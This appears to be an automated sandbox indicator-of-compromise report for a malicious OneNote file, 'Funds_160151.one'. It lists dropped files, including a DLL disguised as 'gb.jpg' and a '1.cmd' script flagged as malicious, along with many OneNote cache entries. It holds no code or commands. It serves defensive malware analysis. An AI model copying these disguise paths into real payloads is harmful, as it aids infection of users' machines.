IOC Report
Funds_160151.one

loading gif

Files

File Path
Type
Category
Malicious
Funds_160151.one
data
initial sample
 malicious
C:\ProgramData\gb.jpg
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
 malicious
C:\Users\Public\1.cmd
ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1E906F6A-A954-476D-9938-3DC6D5700ACA
XML 1.0 document, ASCII text, with CRLF, CR line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml
XML 1.0 document, ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db
SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-shm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-wal
SQLite Write-Ahead Log, version 3007000
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\Quick Notes.one (On 07-02-2023).one (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\~Quick Notes.one.onebackupconstruction
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\Funds_160151.one (On 07-02-2023).one (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\~Funds_160151.one.onebackupconstruction
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000000.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000001.bin (copy)
386 compact demand paged pure executable not stripped
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000002.bin (copy)
SysEx File -
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000003.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin (copy)
PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin (copy)
ASCII text, with very long lines (585), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin (copy)
PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000A.bin (copy)
GIF image data, version 89a, 1012 x 327
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000B.bin (copy)
PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin (copy)
PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000E.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000K.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000019.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001A.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001B.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001C.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001D.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001E.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001F.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001G.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001H.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001I.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001J.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001K.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001L.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001M.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001N.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001O.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001P.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001Q.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001R.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001S.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001T.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001U.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001V.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000020.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000021.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000022.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000023.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000024.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000025.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000026.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000027.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000028.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000029.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002A.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002B.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002C.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002D.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002E.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002F.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002G.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002H.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002I.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002J.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002K.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002L.bin (copy)
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002M.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002N.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002O.bin (copy)
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002P.bin (copy)
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002Q.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002R.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002S.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002T.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002U.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002V.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000030.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000031.bin (copy)
big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000032.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000033.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000034.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000035.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000036.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000037.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000038.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000039.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003A.bin (copy)
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003B.bin (copy)
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003C.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003D.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003E.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003F.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003G.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003H.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003I.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003J.bin (copy)
big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003K.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003L.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003M.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003N.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003O.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003P.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003Q.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003R.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003S.bin (copy)
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003T.bin (copy)
big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003U.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003V.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000040.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000041.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000042.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000043.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000044.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000045.bin (copy)
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000046.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000047.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000048.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000049.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004A.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004B.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004C.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004D.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004E.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004F.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004G.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004H.bin (copy)
PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004I.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004J.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004K.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004L.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004M.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004N.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004O.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004P.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004Q.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004R.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004S.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004T.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004U.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004V.bin (copy)
PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000051.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000053.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin (copy)
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000055.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000057.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000059.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005A.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005B.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005C.bin (copy)
PNG image data, 40 x 623, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005D.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005E.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005F.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005G.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005H.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005I.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005J.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005K.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005L.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005M.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005N.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005O.bin (copy)
PNG image data, 60 x 336, 4-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005P.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005Q.bin (copy)
PNG image data, 40 x 617, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005R.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005S.bin (copy)
PNG image data, 50 x 600, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005T.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005U.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005V.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000060.bin (copy)
PNG image data, 77 x 627, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000061.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000062.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000063.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000064.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000065.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000066.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000067.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000068.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000069.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006A.bin (copy)
PNG image data, 176 x 513, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006B.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006C.bin (copy)
PNG image data, 40 x 650, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin (copy)
data
dropped
